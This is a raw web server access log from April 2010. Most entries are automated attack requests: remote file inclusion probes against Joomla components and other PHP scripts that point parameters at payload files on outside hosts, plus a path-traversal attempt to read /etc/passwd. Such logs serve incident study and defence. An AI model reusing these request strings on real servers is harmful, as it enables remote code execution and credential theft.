64.15.158.246 - - [07/Apr/2010:13:38:14 -0500] "GET /logs/access_log.1268265600%20%20//common/db.php?commonpath=http://www.puzzlecis.com/p1.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:13:38:14 -0500] "GET /logs//common/db.php?commonpath=http://www.puzzlecis.com/p1.txt??? HTTP/1.1" 404 303 "-""Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:13:38:16 -0500] "GET //common/db.php?commonpath=http://www.puzzlecis.com/p1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:13:38:16 -0500] "GET /logs//common/db.php?commonpath=http://www.puzzlecis.com/p1.txt??? HTTP/1.1" 404 303 "-""Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:13:38:17 -0500] "GET /logs/access_log.1268265600%20%20//common/db.php?commonpath=http://www.puzzlecis.com/p1.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
67.195.112.180 - - [07/Apr/2010:13:40:07 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [07/Apr/2010:13:40:07 -0500] "GET /logs/access_log.1173916800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
58.230.162.220 - - [07/Apr/2010:13:41:36 -0500] "GET /logs/access_log.1217203200%20%20/error.php?dir=http://dgjinbo.org/board/data/id1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:13:41:36 -0500] "GET /error.php?dir=http://dgjinbo.org/board/data/id1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:13:41:36 -0500] "GET /logs/error.php?dir=http://dgjinbo.org/board/data/id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:13:41:38 -0500] "GET /error.php?dir=http://dgjinbo.org/board/data/id1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:13:41:38 -0500] "GET /logs/error.php?dir=http://dgjinbo.org/board/data/id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:13:41:38 -0500] "GET /logs/access_log.1217203200%20%20/error.php?dir=http://dgjinbo.org/board/data/id1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:13:41:48 -0500] "GET /error.php?dir=http://dgjinbo.org/board/data/id1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:13:41:48 -0500] "GET /logs/error.php?dir=http://dgjinbo.org/board/data/id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:13:41:52 -0500] "GET /logs/access_log.1217203200%20%20/error.php?dir=http://dgjinbo.org/board/data/id1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:13:41:55 -0500] "GET /logs/access_log.1218067200%20%20/error.php?dir=http://dgjinbo.org/board/data/id1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:13:41:56 -0500] "GET /logs/access_log.1218067200%20%20/error.php?dir=http://dgjinbo.org/board/data/id1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:13:42:03 -0500] "GET /logs/access_log.1218067200%20%20/error.php?dir=http://dgjinbo.org/board/data/id1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
216.193.197.59 - - [07/Apr/2010:13:42:42 -0500] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 351 "-""Mozilla/5.0"
216.193.197.59 - - [07/Apr/2010:13:42:42 -0500] "GET //administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 346 "-""Mozilla/5.0"
216.193.197.59 - - [07/Apr/2010:13:42:42 -0500] "GET /logs/access_log.1227398400//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 373 "-""Mozilla/5.0"
207.46.204.243 - - [07/Apr/2010:13:43:28 -0500] "GET /logs/access_log.1243728000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.193.197.59 - - [07/Apr/2010:13:44:22 -0500] "GET //administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 346 "-""Mozilla/5.0"
216.193.197.59 - - [07/Apr/2010:13:44:22 -0500] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 351 "-""Mozilla/5.0"
216.193.197.59 - - [07/Apr/2010:13:44:22 -0500] "GET /logs/access_log.1227398400//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 373 "-""Mozilla/5.0"
216.193.197.59 - - [07/Apr/2010:13:44:23 -0500] "GET /logs/access_log.1217203200//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 373 "-""Mozilla/5.0"
207.46.199.44 - - [07/Apr/2010:13:44:59 -0500] "GET /logs/access_log.1171929600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
72.46.157.102 - - [07/Apr/2010:13:48:30 -0500] "GET //galeria.php?start=0&kategoria=http://www.fruehaufsteher.de/hpmaker/id1.txt? HTTP/1.1" 404 296 "-""Mozilla/5.0"
72.46.157.102 - - [07/Apr/2010:13:48:30 -0500] "GET /logs//galeria.php?start=0&kategoria=http://www.fruehaufsteher.de/hpmaker/id1.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
72.46.157.102 - - [07/Apr/2010:13:48:32 -0500] "GET /logs/access_log.1240358400//galeria.php?start=0&kategoria=http://www.fruehaufsteher.de/hpmaker/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
72.46.157.102 - - [07/Apr/2010:13:48:55 -0500] "GET /logs/access_log.1236124800//galeria.php?start=0&kategoria=http://www.fruehaufsteher.de/hpmaker/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
125.251.197.130 - - [07/Apr/2010:13:49:10 -0500] "GET ///?path=http://alandar.net/www2/log1.txt? HTTP/1.1" 200 1004 "-""Mozilla/5.0"
125.251.197.130 - - [07/Apr/2010:13:49:10 -0500] "GET /logs///?path=http://alandar.net/www2/log1.txt? HTTP/1.1" 200 811 "-""Mozilla/5.0"
125.251.197.130 - - [07/Apr/2010:13:49:10 -0500] "GET /logs/access_log.1240099200///?path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
125.251.197.130 - - [07/Apr/2010:13:49:28 -0500] "GET ///?path=http://alandar.net/www2/log1.txt? HTTP/1.1" 200 1004 "-""Mozilla/5.0"
125.251.197.130 - - [07/Apr/2010:13:49:28 -0500] "GET /logs///?path=http://alandar.net/www2/log1.txt? HTTP/1.1" 200 811 "-""Mozilla/5.0"
125.251.197.130 - - [07/Apr/2010:13:49:28 -0500] "GET /logs/access_log.1268956800%20%20///?path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
72.46.157.102 - - [07/Apr/2010:13:50:19 -0500] "GET /logs/access_log.1267920000//galeria.php?start=0&kategoria=http://www.fruehaufsteher.de/hpmaker/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
207.46.195.237 - - [07/Apr/2010:13:50:29 -0500] "GET /logs/access_log.1181174400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
72.46.157.102 - - [07/Apr/2010:13:51:49 -0500] "GET /logs/access_log.1267920000%20%20//galeria.php?start=0&kategoria=http://www.fruehaufsteher.de/hpmaker/id1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
174.133.122.210 - - [07/Apr/2010:13:53:04 -0500] "GET //administrator/components/com_swmenupro/ImageManager/Classes/admin.swmenupro.php?mosConfig.absolute.path=http://www.americinn.com//email-images/images/AinuLid1.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
174.133.122.210 - - [07/Apr/2010:13:53:08 -0500] "GET /logs/access_log.1268956800//administrator/components/com_swmenupro/ImageManager/Classes/admin.swmenupro.php?mosConfig.absolute.path=http://www.americinn.com//email-images/images/AinuLid1.txt?? HTTP/1.1" 404 391 "-""Mozilla/5.0"
174.133.122.210 - - [07/Apr/2010:13:53:08 -0500] "GET /logs//administrator/components/com_swmenupro/ImageManager/Classes/admin.swmenupro.php?mosConfig.absolute.path=http://www.americinn.com//email-images/images/AinuLid1.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
59.21.247.137 - - [07/Apr/2010:13:53:24 -0500] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.hackclub.com.ar/javascript//id1.txt? HTTP/1.1" 200 813 "-""Mozilla/5.0"
59.21.247.137 - - [07/Apr/2010:13:53:24 -0500] "GET /logs/access_log.1268265600%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.hackclub.com.ar/javascript//id1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
59.21.247.137 - - [07/Apr/2010:13:53:24 -0500] "GET /////?_SERVER[DOCUMENT_ROOT]=http://www.hackclub.com.ar/javascript//id1.txt? HTTP/1.1" 200 1006 "-""Mozilla/5.0"
59.21.247.137 - - [07/Apr/2010:13:54:19 -0500] "GET /logs/access_log.1268611200%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.hackclub.com.ar/javascript//id1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
207.46.13.136 - - [07/Apr/2010:13:55:59 -0500] "GET /logs/access_log.1199059200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
59.21.247.137 - - [07/Apr/2010:13:57:12 -0500] "GET /view.php?dir=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 292 "-""Mozilla/5.0"
59.21.247.137 - - [07/Apr/2010:13:57:12 -0500] "GET /logs/view.php?dir=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
59.21.247.137 - - [07/Apr/2010:13:57:12 -0500] "GET /logs/access_log.1253491200/view.php?dir=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
59.21.247.137 - - [07/Apr/2010:13:57:12 -0500] "GET /logs/access_log.1260230400/view.php?dir=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
207.46.199.46 - - [07/Apr/2010:13:57:59 -0500] "GET /artwork/mobiles.htm HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
222.236.47.182 - - [07/Apr/2010:13:59:39 -0500] "GET ///com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://dossierpolitico.com//galeria/panistasexpoforum45.jpg??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
222.236.47.182 - - [07/Apr/2010:13:59:39 -0500] "GET /logs/access_log.1218067200%20%20///com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://dossierpolitico.com//galeria/panistasexpoforum45.jpg??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
222.236.47.182 - - [07/Apr/2010:13:59:39 -0500] "GET /logs///com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://dossierpolitico.com//galeria/panistasexpoforum45.jpg??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
222.236.47.182 - - [07/Apr/2010:13:59:50 -0500] "GET /logs///com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://dossierpolitico.com//galeria/panistasexpoforum45.jpg??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
222.236.47.182 - - [07/Apr/2010:13:59:50 -0500] "GET /logs/access_log.1218067200%20%20///com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://dossierpolitico.com//galeria/panistasexpoforum45.jpg??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
222.236.47.182 - - [07/Apr/2010:13:59:50 -0500] "GET ///com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://dossierpolitico.com//galeria/panistasexpoforum45.jpg??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
222.236.47.182 - - [07/Apr/2010:13:59:51 -0500] "GET /logs///com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://dossierpolitico.com//galeria/panistasexpoforum45.jpg??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
222.236.47.182 - - [07/Apr/2010:13:59:51 -0500] "GET ///com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://dossierpolitico.com//galeria/panistasexpoforum45.jpg??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
222.236.47.182 - - [07/Apr/2010:13:59:51 -0500] "GET /logs/access_log.1218067200%20%20///com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://dossierpolitico.com//galeria/panistasexpoforum45.jpg??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
188.165.195.229 - - [07/Apr/2010:14:00:11 -0500] "GET /logs/access_log.1223164800%20%20/?setup[use_category]=1&dir=http://200.199.242.22/images/.ajim/ajim1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
188.165.195.229 - - [07/Apr/2010:14:00:11 -0500] "GET /logs/?setup[use_category]=1&dir=http://200.199.242.22/images/.ajim/ajim1.txt? HTTP/1.1" 200 805 "-""Mozilla/5.0"
188.165.195.229 - - [07/Apr/2010:14:00:11 -0500] "GET /?setup[use_category]=1&dir=http://200.199.242.22/images/.ajim/ajim1.txt? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
178.93.209.17 - - [07/Apr/2010:14:00:48 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.7 Safari/532.0"
178.93.209.17 - - [07/Apr/2010:14:00:49 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.7 Safari/532.0"
178.93.209.17 - - [07/Apr/2010:14:00:53 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.7 Safari/532.0"
178.93.209.17 - - [07/Apr/2010:14:01:11 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.7 Safari/532.0"
178.93.209.17 - - [07/Apr/2010:14:01:11 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.7 Safari/532.0"
178.93.209.17 - - [07/Apr/2010:14:01:11 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.7 Safari/532.0"
178.93.209.17 - - [07/Apr/2010:14:01:12 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.7 Safari/532.0"
178.93.209.17 - - [07/Apr/2010:14:01:12 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.7 Safari/532.0"
178.93.209.17 - - [07/Apr/2010:14:01:13 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.7 Safari/532.0"
178.93.209.17 - - [07/Apr/2010:14:01:13 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.7 Safari/532.0"
178.93.209.17 - - [07/Apr/2010:14:01:13 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.7 Safari/532.0"
178.93.209.17 - - [07/Apr/2010:14:01:13 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.7 Safari/532.0"
178.93.209.17 - - [07/Apr/2010:14:01:13 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.7 Safari/532.0"
178.93.209.17 - - [07/Apr/2010:14:01:14 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.7 Safari/532.0"
178.93.209.17 - - [07/Apr/2010:14:01:16 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.7 Safari/532.0"
212.227.141.53 - - [07/Apr/2010:14:04:00 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 200 1005 "-""Mozilla/5.0"
212.227.141.53 - - [07/Apr/2010:14:04:00 -0500] "GET /logs/access_log.1258329600////?_SERVER[DOCUMENT_ROOT]=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 314 "-""Mozilla/5.0"
212.227.141.53 - - [07/Apr/2010:14:04:00 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 200 812 "-""Mozilla/5.0"
195.56.65.232 - - [07/Apr/2010:14:06:38 -0500] "GET /?sourcedir=http://solid.go.ro/d1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
195.56.65.232 - - [07/Apr/2010:14:06:38 -0500] "GET /logs/?sourcedir=http://solid.go.ro/d1.txt?? HTTP/1.1" 200 805 "-""Mozilla/5.0"
195.56.65.232 - - [07/Apr/2010:14:06:38 -0500] "GET /logs/access_log.1217635200/?sourcedir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
212.227.141.53 - - [07/Apr/2010:14:11:10 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 200 1005 "-""Mozilla/5.0"
212.227.141.53 - - [07/Apr/2010:14:11:10 -0500] "GET /logs/access_log.1258329600////?_SERVER[DOCUMENT_ROOT]=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 314 "-""Mozilla/5.0"
212.227.141.53 - - [07/Apr/2010:14:11:10 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 200 812 "-""Mozilla/5.0"
67.195.112.180 - - [07/Apr/2010:14:11:22 -0500] "GET /logs/access_log.1179705600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
200.93.147.154 - - [07/Apr/2010:14:12:10 -0500] "GET /logs/access_log.1217203200%20%20//include/write.php?dir=http://www.pro-veillance.fr/components/com_virtuemart/F1.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
200.93.147.154 - - [07/Apr/2010:14:12:10 -0500] "GET /logs//include/write.php?dir=http://www.pro-veillance.fr/components/com_virtuemart/F1.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
200.93.147.154 - - [07/Apr/2010:14:12:13 -0500] "GET //include/write.php?dir=http://www.pro-veillance.fr/components/com_virtuemart/F1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
212.227.141.53 - - [07/Apr/2010:14:13:45 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 200 1005 "-""Mozilla/5.0"
212.227.141.53 - - [07/Apr/2010:14:13:45 -0500] "GET /logs/access_log.1258329600////?_SERVER[DOCUMENT_ROOT]=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 314 "-""Mozilla/5.0"
212.227.141.53 - - [07/Apr/2010:14:13:45 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 200 812 "-""Mozilla/5.0"
207.46.13.40 - - [07/Apr/2010:14:13:50 -0500] "GET /logs/access_log.1226102400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.97.235.45 - - [07/Apr/2010:14:15:34 -0500] "GET /logs/access_log.1260662400/index.php?x=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.833"
216.97.235.45 - - [07/Apr/2010:14:15:35 -0500] "GET /logs/index.php?x=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.833"
216.97.235.45 - - [07/Apr/2010:14:15:36 -0500] "GET /index.php?x=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.833"
216.97.235.45 - - [07/Apr/2010:14:15:36 -0500] "GET /logs/access_log.1239062400/index.php?x=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.833"
195.56.65.232 - - [07/Apr/2010:14:17:29 -0500] "GET /logs/access_log.1219449600/?sourcedir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
195.56.65.232 - - [07/Apr/2010:14:17:34 -0500] "GET /logs/access_log.1223164800/?sourcedir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
72.46.157.102 - - [07/Apr/2010:14:19:21 -0500] "GET //galeria.php?start=0&kategoria=http://www.fruehaufsteher.de/hpmaker/id1.txt? HTTP/1.1" 404 296 "-""Mozilla/5.0"
72.46.157.102 - - [07/Apr/2010:14:19:21 -0500] "GET /logs/access_log.1240358400//galeria.php?start=0&kategoria=http://www.fruehaufsteher.de/hpmaker/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
72.46.157.102 - - [07/Apr/2010:14:19:21 -0500] "GET /logs//galeria.php?start=0&kategoria=http://www.fruehaufsteher.de/hpmaker/id1.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
207.46.13.86 - - [07/Apr/2010:14:20:20 -0500] "GET /logs/access_log.1234656000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
72.46.157.102 - - [07/Apr/2010:14:21:29 -0500] "GET /logs/access_log.1267920000//galeria.php?start=0&kategoria=http://www.fruehaufsteher.de/hpmaker/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
72.46.157.102 - - [07/Apr/2010:14:22:19 -0500] "GET /logs/access_log.1267920000%20%20//galeria.php?start=0&kategoria=http://www.fruehaufsteher.de/hpmaker/id1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
207.46.204.238 - - [07/Apr/2010:14:23:49 -0500] "GET /logs/access_log.1167091200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
195.56.65.232 - - [07/Apr/2010:14:23:59 -0500] "GET /logs/access_log.1219708800/?sourcedir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
207.46.204.243 - - [07/Apr/2010:14:24:19 -0500] "GET /logs/access_log.1177113600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.90 - - [07/Apr/2010:14:28:49 -0500] "GET /?M=A HTTP/1.1" 200 1003 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.199.188 - - [07/Apr/2010:14:32:44 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
72.46.157.102 - - [07/Apr/2010:14:32:49 -0500] "GET /logs/access_log.1255046400//galeria.php?start=0&kategoria=http://www.fruehaufsteher.de/hpmaker/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
125.251.197.130 - - [07/Apr/2010:14:34:00 -0500] "GET //skin/happycast/write.php?dir=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
125.251.197.130 - - [07/Apr/2010:14:34:00 -0500] "GET /logs/access_log.1261180800//skin/happycast/write.php?dir=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
125.251.197.130 - - [07/Apr/2010:14:34:00 -0500] "GET /logs//skin/happycast/write.php?dir=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
174.133.122.210 - - [07/Apr/2010:14:36:45 -0500] "GET //components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.americinn.com//email-images/images/AinuLid1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
174.133.122.210 - - [07/Apr/2010:14:36:45 -0500] "GET /logs/access_log.1211760000//components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.americinn.com//email-images/images/AinuLid1.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
174.133.122.210 - - [07/Apr/2010:14:36:45 -0500] "GET /logs//components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.americinn.com//email-images/images/AinuLid1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
200.93.147.154 - - [07/Apr/2010:14:38:55 -0500] "GET //include/write.php?dir=http://www.pro-veillance.fr/components/com_virtuemart/F1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
200.93.147.154 - - [07/Apr/2010:14:38:56 -0500] "GET /logs//include/write.php?dir=http://www.pro-veillance.fr/components/com_virtuemart/F1.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
200.93.147.154 - - [07/Apr/2010:14:38:58 -0500] "GET /logs/access_log.1217203200%20%20//include/write.php?dir=http://www.pro-veillance.fr/components/com_virtuemart/F1.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:14:39:30 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.puzzlecis.com/p1.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:14:39:30 -0500] "GET /logs/access_log.1218067200%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.puzzlecis.com/p1.txt??? HTTP/1.1" 404 357 "-""Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:14:39:30 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.puzzlecis.com/p1.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
222.236.47.182 - - [07/Apr/2010:14:39:42 -0500] "GET ////index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://dossierpolitico.com//galeria/panistasexpoforum45.jpg??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
222.236.47.182 - - [07/Apr/2010:14:39:42 -0500] "GET /logs/access_log.1238112000////index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://dossierpolitico.com//galeria/panistasexpoforum45.jpg??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
